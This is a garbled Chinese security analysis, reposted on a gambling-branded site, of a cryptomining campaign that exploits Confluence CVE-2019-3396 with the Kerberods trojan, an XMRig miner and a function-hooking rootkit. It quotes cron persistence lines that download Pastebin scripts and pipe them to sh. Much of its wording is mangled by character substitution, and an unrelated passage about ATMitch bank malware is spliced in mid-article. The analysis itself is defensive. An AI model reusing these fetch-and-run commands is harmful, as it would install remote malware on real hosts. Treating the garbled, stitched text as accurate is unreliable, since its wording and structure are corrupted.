运用Rootkit完成歹意挖矿:CVE-2019-3396破绽新型歹意应用体式格局剖析 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

运用Rootkit完成歹意挖矿:CVE-2019-3396破绽新型歹意应用体式格局剖析

申博_新闻事件 申博 156次浏览 已收录 0个评论

概述

Confluence是一个普遍运用的合作与计划软件。在2019年3月,Atlassian宣布了一份征询申报,涉及到两个Confluence的症结破绽。4月,我们观察到个中一个破绽,即东西衔接器破绽CVE-2019-3396被要挟参与者歹意应用以实行歹意进击。平安供应商Alert Logic还发明该破绽被应用于投放Gandcrab讹诈软件。

上述这些事宜,应当不会是我们末了一次发明CVE-2019-3396的开发应用事宜,由于要挟行动者仍然在寻觅应用此破绽的新方法。我们发明,该破绽还被应用于供应一个加密泉币发掘的歹意软件,个中包罗一个旨在隐蔽其运动的Rootkit。这类手艺很轻易让我们联想到2018年11月发作的另外一起运用挖矿东西+Rootkit组合的进击。

投放和流传

该歹意运动的沾染链以下:

运用Rootkit完成歹意挖矿:CVE-2019-3396破绽新型歹意应用体式格局剖析

在进击开始时,起首发送一个长途敕令,从Pastebin下载Shell剧本(hxxps://pastebin[.]com/MjGrx7EA)。

该Shell剧本会停止某些历程,然后从另外一个Pastebin(hxxps://pastebin[.]com/CvJM3qz5)下载并实行lsd_1文件。该文件是第二个Shell剧本,它会投放第三个Shell剧本lsd_2,该剧本来自另外一个Pastebin(hxxps://pastebin[.]com/a3EAddwq)。

这一Shell剧本卖力从下面的服务器中,下载木马程序:

gwjyhs[.]com
img[.]sobot[.]com

歹意软件Kerberods(检测为Trojan.Linux.KERBERDS.A)是一个自定义打包的二进制文件,该歹意软件会经由历程cron义务来自行装置:

*/10* * * * curl -fsSL hxxps://pastebin[.]com/raw/60T3uCcb|sh
*/15* * * * wget -q -O- hxxps://pastebin[.]com/raw/60T3uCcb|sh
*/10* * * * root curl -fsSL hxxps://pastebin[.]com/raw/60T3uCcb|sh
*/15* * * * root wget -q -O- hxxps://pastebin[.]com/raw/60T3uCcb|sh
*/15* * * * (curl -fsSL hxxps://pastebin[.]com/raw/rPB8eDpu||wget -q -O-hxxps://pastebin[.]com/raw/rPB8eDpu)|sh

Kerberods卖力投放加密泉币发掘东西(khugepageds,检测为Coinminer.Linux.MALXMR.UWEJI)及Rootkit组件。

在这里,有一个异常值得存眷的处所,就是二进制文件投放Rootkit的体式格局。起首,它将Rootkit的代码写入名为/usr/local/lib/{random filename}.c的文件中。

运用Rootkit完成歹意挖矿:CVE-2019-3396破绽新型歹意应用体式格局剖析

然后,经由历程gcc编译Rootkit,输出二进制文件到/usr/local/lib/{random filename}.so。

编译Rootkit代码:

运用Rootkit完成歹意挖矿:CVE-2019-3396破绽新型歹意应用体式格局剖析

Kerberods另有多种流传体式格局,好比应用CVE-2019-1003001和CVE-2019-1003000破绽经由历程SSH体式格局流传。

至于khugepageds,它是一个XMRig 2.14.1-mo1 门罗币(Monero)挖矿东西,该挖矿的设置装备摆设信息以硬编码的情势保存到二进制文件中:

挖矿东西的设置装备摆设:

运用Rootkit完成歹意挖矿:CVE-2019-3396破绽新型歹意应用体式格局剖析

我们可以或许在systemten[.]org:51640接见该挖矿东西所运用的矿池。

运用Rootkit回避检测

如前文所述,此次进击与客岁发作的进击事宜具有很多雷同的特性,比方:都运用了Pastebin作为C&C服务器、挖矿Payload雷同、运用Rootkit来隐蔽歹意软件。

与Kerberods一样,挖矿东西Payload也是用自定义加壳东西来防备平安研究人员的剖析。

银行恶意软件ATMitch再次出现

简介 4月第一天,yoroi安全实验室检测到了一个新的恶意软件样本。初步鉴定结果显示,它可能与两年前俄罗斯某家银行遭黑客袭击事件相关,卡巴斯基实验室曾对此做过记录,此次事件的幕后黑手是某一APT组织,攻击者利用了一种名为ATMitch的特定恶意软件工具,在大范围的企业网络入侵后,手动安装在目标银行的ATM机上,进而操纵ATM机的取款过程。该恶意软件可能自2017年起便一直活跃在野外。 技术分析 可执行样本是名为“tester.exe”的PE32 x86文件。它似乎是用于加载恶意payload的自定义加载器,payload能够控制目标机器。 表1:关于ATMitch的Dropper / Loader的信息 静态数据显示,该样本是2017年10月8日完成编译的,比卡巴斯基披露ATMitch攻击行动晚了几个月。虽然日期有被篡改的可能,但其他静态细节表明,日期更有可能是真实的。 图1:payload作为加载器的资源 可执行文件启动后,会在“C:\ intel”上创建一个新文件夹,然后开始检查所有正在运行的进程,并找寻一个非常特殊的进程——“fwmain32.exe”。“fwmain32”是德国德利多富公司(Wincor Nixdorf International GmbH)提供的软件服务中的一个进程,而德利多富正是提供零售和银行硬件(如ATM)的主要供应商之一。 图

运用Rootkit完成歹意挖矿:CVE-2019-3396破绽新型歹意应用体式格局剖析

与仅对readdir函数举行挂钩从而隐蔽挖矿历程的旧版本Rootkit分歧,新版本对更多函数举行了挂钩。在新版本中,不只隐蔽了挖矿历程,还隐蔽了某些文件和收集流量。除此之外,还可以或许捏造主机的CPU运用率。

新版本歹意软件挂钩的函数包罗:

fopen、fopen64、lstat、lxstat、open、rmdir、stat、stat64、__xstat、__xstat64、unlink、unlinkat、opendir、readdir、readdir6。

若是它们的参数中包罗诸如rootkit、miner或ld.so.preload如许的文件名,那末大多数挂钩函数都邑返回“No such file or directory error”(无此类文件或目次毛病)。

被挂钩的函数返回毛病,以隐蔽歹意软件沾染的迹象:

运用Rootkit完成歹意挖矿:CVE-2019-3396破绽新型歹意应用体式格局剖析

下图展现了加载Rootkit时和未加载Rootkit时的htop体系监控输出。我们可以或许重点存眷加载Rootkit后怎样隐蔽CPU运用率和挖矿历程。

下图为htop体系监控东西的输出,左图为未加载Rootkit时,右图为加载Rootkit时:

运用Rootkit完成歹意挖矿:CVE-2019-3396破绽新型歹意应用体式格局剖析

下图为netstat的输出,左图为未加载Rootkit时,右图为加载Rootkit时:

运用Rootkit完成歹意挖矿:CVE-2019-3396破绽新型歹意应用体式格局剖析

下图为捏造CPU运用率和TCP衔接的函数:

运用Rootkit完成歹意挖矿:CVE-2019-3396破绽新型歹意应用体式格局剖析

捏造收集流量:

运用Rootkit完成歹意挖矿:CVE-2019-3396破绽新型歹意应用体式格局剖析

捏造CPU运用率:

运用Rootkit完成歹意挖矿:CVE-2019-3396破绽新型歹意应用体式格局剖析

Rootkit还将挂钩接见函数作为一种耐久化的体式格局,以便建立一个cron义务,从而在该义务被调用时重新装置歹意软件。

下图展现了用于下载和实行Kerberods的cron义务代码:

运用Rootkit完成歹意挖矿:CVE-2019-3396破绽新型歹意应用体式格局剖析

平安发起和解决计划

在很短的时间内,我们就已看到了多起应用CVE-2019-3396的现实进击事宜。这表明收集犯罪分子致力于(而且可以或许)以多种体式格局滥用以后最新的破绽。因而,作为防备者,更应当展开延续监控,以检测构造中存在的任何要挟。

为了举行有效地监控,构造可以或许运用夹杂云平安解决计划,该解决计划可以或许针对DevOps供应壮大、简朴和自动化的平安保证。另外,该计划中还具有多种要挟防备手艺,用于珍爱物理主机、虚拟主机和云主机。借助一些服务器深度平安防护体系,可以或许资助DevOps和平安团队在预运转和运转时扫描容器映像,并确保其平安性。

该歹意运动的检测规则为:

· Atlassian Confluence服务器长途实行代码破绽(CVE-2019-3396)


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明运用Rootkit完成歹意挖矿:CVE-2019-3396破绽新型歹意应用体式格局剖析
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址